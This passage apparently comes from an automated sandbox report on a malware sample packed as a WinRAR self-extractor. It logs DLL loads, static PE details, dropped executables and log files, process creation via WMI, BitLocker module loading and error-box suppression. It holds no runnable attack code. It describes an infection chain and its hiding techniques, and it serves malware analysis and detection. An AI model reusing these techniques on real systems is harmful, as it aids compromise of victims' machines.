                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: winmmbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mmdevapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ksuser.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: avrt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: audioses.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: msacm32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: midimap.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: file.exeStatic file information: File size 2331371 > 1048576
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: AppDINetCookntkrnlmp.pdb source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
                                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\MsContainer\__tmp_rar_sfx_access_check_4612281Jump to behavior
                                  Source: file.exeStatic PE information: section name: .didat
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F640 push ecx; ret 0_2_00E4F653
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4EB78 push eax; ret 0_2_00E4EB96
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeCode function: 4_2_00007FFD9B7800BD pushad ; iretd 4_2_00007FFD9B7800C1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B66D2A5 pushad ; iretd 8_2_00007FFD9B66D2A6
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B7800BD pushad ; iretd 8_2_00007FFD9B7800C1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B852316 push 8B485F92h; iretd 8_2_00007FFD9B85231B
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B7DCD10 push eax; retf 5F4Dh14_2_00007FFD9B7DD8FD
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B7DCD10 push ss; retf 5F4Dh14_2_00007FFD9B7DD937
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B7800BD pushad ; iretd 14_2_00007FFD9B7800C1
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9BCF8D72 push B9FFFFFEh; ret 14_2_00007FFD9BCF8D77
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9BCF0528 push es; retf 14_2_00007FFD9BCF0527
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9BCF0104 push es; retf 14_2_00007FFD9BCF0527
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 15_2_00007FFD9B7700BD pushad ; iretd 15_2_00007FFD9B7700C1
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 19_2_00007FFD9B7900BD pushad ; iretd 19_2_00007FFD9B7900C1
                                  Source: chainportruntimeCrtMonitor.exe.0.drStatic PE information: section name: .text entropy: 7.571044505376463
                                  Source: kahKUDRlEYHfKIalWlM.exe.4.drStatic PE information: section name: .text entropy: 7.571044505376463

                                  Persistence and Installation Behavior

                                  barindex
                                  Creates processes via WMI
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\jYCYFtEB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\GYwcCMoE.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\QRPSxHgy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\WzsROUza.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\aEtIhTbg.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\pQfxiZJp.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\HnGdNOQQ.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\vCAeICGo.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\YuXIhBvf.logJump to dropped file
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\MsContainer\chainportruntimeCrtMonitor.exeJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\vJIWLFOd.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\UFpBXUVk.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\ZlAIxOci.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\QRPSxHgy.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\HnGdNOQQ.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\ZlAIxOci.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\vCAeICGo.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\aEtIhTbg.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\YuXIhBvf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\UFpBXUVk.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\jYCYFtEB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\GYwcCMoE.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\pQfxiZJp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\WzsROUza.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile created: C:\Users\user\Desktop\vJIWLFOd.logJump to dropped file

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Loading BitLocker PowerShell Module
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
